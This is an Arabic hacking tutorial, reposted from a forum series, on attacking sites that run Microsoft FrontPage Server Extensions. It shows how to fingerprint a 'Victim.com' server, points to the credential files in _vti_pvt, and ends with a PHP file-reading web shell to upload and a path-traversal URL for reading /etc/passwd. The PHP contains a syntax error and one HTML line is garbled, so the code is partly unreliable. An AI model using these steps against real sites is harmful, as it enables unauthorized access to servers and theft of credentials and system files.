الشرح السابع عشر ل تعلم الاختراق من والى

بسم الله الرحمن الرحيم



" معلومات مهمة عن المواقع التي تدعم الفرونت بيج "
<منقول>
<الكاتب: T.O.L. ( DeXXa ) .>
ما الذي يجب أن تعرفه قبل قراءة هذا الدرس :

* الالمام بالانجليزية .
* قراءة المزيد عن الـ FrontPage Server Extensions و ليس كيفية اختراقه .
* كيفية التعامل مع برنامج Microsoft Office FrontPage .
* كيفية التعامل مع الـ CHMOD .
* كيفية التعامل مع الـ Telnet .
* كيفية التعامل مع بروتوكول HTTP .
* كيفية التعامل مع قواعد البيانات العلائقية SQL .
* كيفية التعامل مع أحد لغات الويب و التي تعمل بناحية الخادم Server Side Scripting Language .

و اذكر أخيراً بأني اؤمن بأن المخترق ما هو إلا انسان وظيفته البرمجة و ادارة و تحليل النظم و الشبكات و ليس انسان همه هو معرفة القليل
من الأمور التي تساعده في التخريب و العبث بما تعب به الآخرون و تضييع الوقت في الدردشة و التسكع بمقاهي الانترنت ، و لذا فافترض بأن
ما أقوله سيكون واضحاً و لا يحتاج لـ Screen Capture .

@ خريطة الموضوع :

. ما الذي ستسفيده عند قراءة الموضوع ؟
. مقدمة
. ما هو الـ FrontPage Server Extensions ؟
. ما هي آلية عمل الـ FrontPage Extension Server ؟
. كيفية الاتصال بـ FrontPage Extension Server
. كيفية معرفة هل الموقع يدعم الـ FrontPage أم لا
. كيفية استغلاله ليصبح في صلاحك


@ ما الذي ستستفيده عند قراءتك للموضوع ؟

* ستعرف ما هو الـ FrontPage Server Extensions .
* آلية عمله .
* كيفية جمع المعلومات الخاصة بأي موقع .
* بعض الطرق للاستفادة منه عند الاتصال بالخادم الخاص به .

@ مقدمة :

تسعى شركات التسكين بأنواعها توفير شتى شبل الراحة لعملائها ، فتجدهم يقدمون العروض و التخفيضات لارضاء العملاء مثل دعم لـ PHP و
CGI و Perl و SSL و FTP و SQL .

و بالنسبة لمدارء المواقع Webmasters فإن البرنامج المفضل لهم لتصميم مواقعهم هو Microsoft Office FrontPage و الذي كما هو مبين يأتي
مع حزمة Office ، اذ يتميز بسهولة استعماله كما انه يوفر بعض البرمجيات مثل عداد الزوار ، و لذا تقدم شركات التسكين دعم كامل للبرنامج .

@ ما هو الـ FrontPage Server Extensions ؟

( ملاحظة : سأتكلم حالياً عن الحزم التي أتت بعد حزمة الاصدار الثاني )

هو عبارة عن حزمة من البرامج يتم تثبيتها في الخادم Server الخاص بشركة التسكين التي لها قالبية لدعم بعض الخصائص .

و عند التثبيت يجب انشاء عدة مجلدات منها :

/_private
/_vti_bin
/_vti_cnf
/_vti_log
/_vti_pvt
/_vti_txt

و سأتكلم عن وظيفة كل مجلد يهمنا :

* المجلد _vti_bin :

و يتواجد بداخله مجلدان هما :

( ملاحظة : النقطتان تشيران إلى المجلد _vti_bin )

../_vti_adm/
../_vti_aut/

الثاني لا يهمنا بقدر ما يهم المجلد الأول اذ أنه الخاص بالمشرف ولا تستطيع الاستفادة منه اذا لم تحصل على كلمة المرور الخاصة به .
كما يوجد ملفان هما :

../shtml.exe
../fpcount.exe

* المجلد _vti_pvt :

و يتواجد بداخله عدة ملفات ما يهمنا منها هو الملفات التالية :

- الملف service.pwd : و فيه يتواجد المعرف و كلمة المرور الخاصة بالمشرف مشفرة بمقياس DES .
- الملف service.grp : و فيه يتواجد المعرفين من مشرفين و authors .
- ملفي deptodoc.btr و doctodep.btr : و فيه يتواجد مسارات الملفات التي تم تحميلها على الخادم ، فاذا قمت بتنزيله فتستطيع معرفة الملفات
الموجودة بالموقع .

و في الغالب لا تستطيع معاينة محتويات المجلد اذ يوجد في المجلد الرئيسي للموقع ملف .htaccess يقوم بمنع الجميع ( المالك و المجموعة و
الزوار ) من معاينة المجلد و محتوياته .

( ملاحظة : ان عدم وضع أي صلاحية على المجلدلا يعني بأنها تعتبر ثغرة و لكن ضعف من الناحية )

* المجلد _private :

و يتواجد بداخله ملف واحد فقط هو .htaccess .

@ ما هي آلية عمل الـ FrontPage Extension Server ؟

يعتمد الاتصال بين العميل و الـ FrontPage Extension Server على بروتوكول الـ HTTP .

فلو اردنا معاينة عداد الزوار عن طريق برنامج الـ FrontPage فانه يتم ارسال طلب Request للخادم ثم يمرره الخادم بالـ FrontPage Extension Server
و الذي يمرره بالتالي ببرمجيات الخادم مثل fpcount.exe ، و من ثم يكرر تمريره مرة أخرى إلى الـ Extension Server و إلى الخادم و يظهر المخرجات
لـ العميل ، علماً ان هذه الاتصالات تتم عبر جدار نار .

@ كيفية الاتصال بـ FrontPage Extension Server :

كما ذكرنا سابقاً ان أغلب شركات التسكين تسعى لراحة العملاء ، فتجدها تدعم خدمة الـ FrontPage و ذلك لتحميل الصفحات للموقع علماً بأنها
تدعم بروتوكول الـ FTP و تحميل الملفات و انشاء المجلدات عبر المتصفح اعتماداً على البرمجيات التي تعمل بناحية الخادم .
و الآن قم بتنفيذ التالي لمعرفة كيفية الاتصال بالـ FrontPage Extension Server :

( ملاحظة : سأتكلم حالياً عن حزمة الـ XP و التي لا تختلف أبداً عن الحزم الباقية إلا في بعض النقاط الشكلية )

* قم بتشغيل برنامج الـ FrontPage و الذي يأتي مرفقاً مع حزمة Office .
* من قائمة File قم باختيار Open Web .
* قم باضافة المعرف و كلمة المرور ( الأصلية و ليست المشفرة ) .
* اذا كانت صحيحة سيظهر لك الخادم ملفات الموقع كلها و عندها تستطيع التحميل و التعديل في الملفات و المجلدات و معاينة الشفرة المصدرية
للملفات .
* اذا لم تتم العملية بنجاح فهذا يعني بأن الموقع لا يدعم الخدمة أو أن المعرف أو كلمة المرور خاطئة و يطلب منك معاينتها في وضعية القراءة و لا
يظهر لك الشفرة المصدرية الأصلية ولا المجلدات و الملفات التي يحويها الموقع .

@ كيفية معرفة هل الموقع يدعم الـ FrontPage أم لا :

يوجد العديد من الطرق لمعرفة قابلية الموقع لدعم الفرونت بيج نذكر منها :

* معاينة ملف نجاح التثبيت :

( ملاحظة : قد لا تجد ملف _vti_inf.html و لكن هذا لا يعني أن الموقع لا يدعم الخدمة ، كما أنه لا يعتبر ثغرة )

- قم بزيارة أي موقع تريد أن تعرف هل الخادم الخاص به يدعم الـ FrontPage أم لا .
- قم بمعانية ملف _vti_inf.html بواسطة المتصفح و ذلك بارفاقه بعنوان الموقع ، مثال :

http://www.Victim.com/_vti_inf.html

- و عند معاينة الصفحة ستجد جملة FrontPage Configuration Information ، فهذا معناه أن حزمة الـ FrontPage Extension Server قد تم تثبيتها
في الخادم بنجاح .

و لمعرفة اصدارة الخدمة قم بالتالي :

- قم بالنقر بزر الفأرة الأيمن على الصفحة ، ثم قم باختيار Source Code .
- قم بالبحث عن FPVersion="Version" حيث Version تشير للاصدار الخاص بالخدمة .

* عن طريق مجلد _vti_cnf :

- قم بزيارة أي موقع تريد أن تعرف هل الخادم الخاص به يدعم الـ FrontPage أم لا .
- قم بمعانية المجلد بواسطة المتصفح و ذلك بارفاقه بعنوان الموقع ، مثال :

http://www.Victim.com/_vti_cnf

- قم بالنقر بزر الفأرة الأيمن على الصفحة ، ثم قم باختيار Source Code .
- قم بالبحث عن الشفرة التالية :

vti_generator:Programe

- حيث Programe يشير لنوع البرنامج و اصدارته و سيكون في حالتنا هو Microsoft FrontPage X و الاصدارة الخاصة به هي X .

* الكشف عن الشفرة المصدرية للصفحة :

- قم بزيارة أي موقع تريد أن تعرف هل الخادم الخاص به يدعم الـ FrontPage أم لا .
- قم بالنقر بزر الفأرة الأيمن على الصفحة ، ثم قم باختيار Source Code .
- قم بالبحث بين ترميزي الرأس <Head></Head> عن الشفرة التالية :

<**** Name="GENERATOR" &@#&@#&@#&@#&@#&@#&@#="Programe">

- حيث Programe يرمز لنوع البرنامج و اذا كان البرنامج هو Microsoft FrontPage X.0 يتبين لنا بأن الخادم الخاص بالموقع يدعم الفرونت بيج و
الاصدارة الخاصة به هي X .

* عن طريق موقع NetCraft :

- قم بزيارة الموقع NetCraft.net .
- قم بكتابة عنوان الموقع مستثنياً الـ http:// .
- انتظر بضع ثواني .
- ستجد أن الموقع أعطاك بعض المعلومات عن الملقم و الخدمات الموجودة في الموقع الذي تريد معرفة قابلية دعمه للبرنامج ، و من تلك الخدمات
خدمة الـ FrontPage و ستظهر لك بالشكل mod_frontpage/X حيث X يرمز لاصدارة الـ FrontPage Extensions Server .

* عن طريق الـ Telnet :

( ملاحظة : تساعد هذه الطريقة في معرفة بعض المعلومات عن الخادم و المخرجات هي نفس مخرجات الطريقة السابقة )

- من قائمة Start قم باختيار Run و اكتب بالنافذة التي ستظهر Telnet .
- قم بالاتصال بالموقع عبر المنفذ 80 بالشكل التالي :

Microsoft Telnet> Open www.Victim.com 80

- قم بارسال طلب Request للخادم و لتكن الطريقة Method هي Head .

( ملاحظة : عليك الالمام بكيفية التعامل مع بروتوكول HTTP )

- قم بارسال التالي حيث http://www.Victim.net هو الموقع الضحية و ISP.net هو البروكسي الخاص بمزود الخدمة الخاص بك :

Head www.Victim.net HTTP/1.1
Host: ISP.net
Accept: */*
Connection: close

- انتظر بضع ثواني .
- ستستلم الاجابة Response عن الطلب الذي ارسلتهب للخادم Server مثل تاريخ آخر تعديل للصفحة و نوع الملقم و الخدمات المتوفرة به .
و من ضمن الخدمات ستجد نفس الذي وجدناه في الطريقة السابقة و هو أن خدمة الـ FrontPage و ستظهر لك بالشكل mod_frontpage/X
حيث X يرمز لاصدارة الـ FrontPage Extensions Server .

@ كيفية استغلاله ليصبح في صالحك :

اذا عثرت على موقع يدعم هذه الخدمة و لم يتم وضع صلاحيات على مجلد الـ _vti_pvt قم بالتالي :

( ملاحظة : عليك الالمام بلغة تعمل على ناحية الخادم و في حالتنا فهي الـ PHP ، كما أن على الموقع الضحية دعم هذه اللغة )

* قم بالاتصال بالموقع الضحية .
* قم بتحميل ملف ينتهي امتداده بـ PHP و ضمنه التالي :

<?PHP

$open = FOpen($file, "r");
$get = FGets($open, FileSize($file));

Echo $get;

FClose $open;

?>

و قمنا هنا برفع ملف PHP للخادم يقوم بفتح ملف غير معين ثم يحضر محتوياته على حسب حجمه بالبايت ثم يعرضه ثم يغلق الملف ، و الآن كل
ما عليك فعله الآن هو الدخول على الموقع عبر المتصفح و الحاقه بـ بعنوان الملف الذي حملته و المتغير file و الملف الذي تريد معاينة الشفرة
المصدرية الخاصة به ، مثال :

http://www.Victim.com/uploded_file...../../etc/passwd

حيث uploded_file يشير لاسم الملف الذي قمت بتحميله ، و تستطيع اضافة اوامر تسمح لك بمعاينة الملفات و المجلدات الموجودة في الخادم .

انتهى،،،


بالتوفيق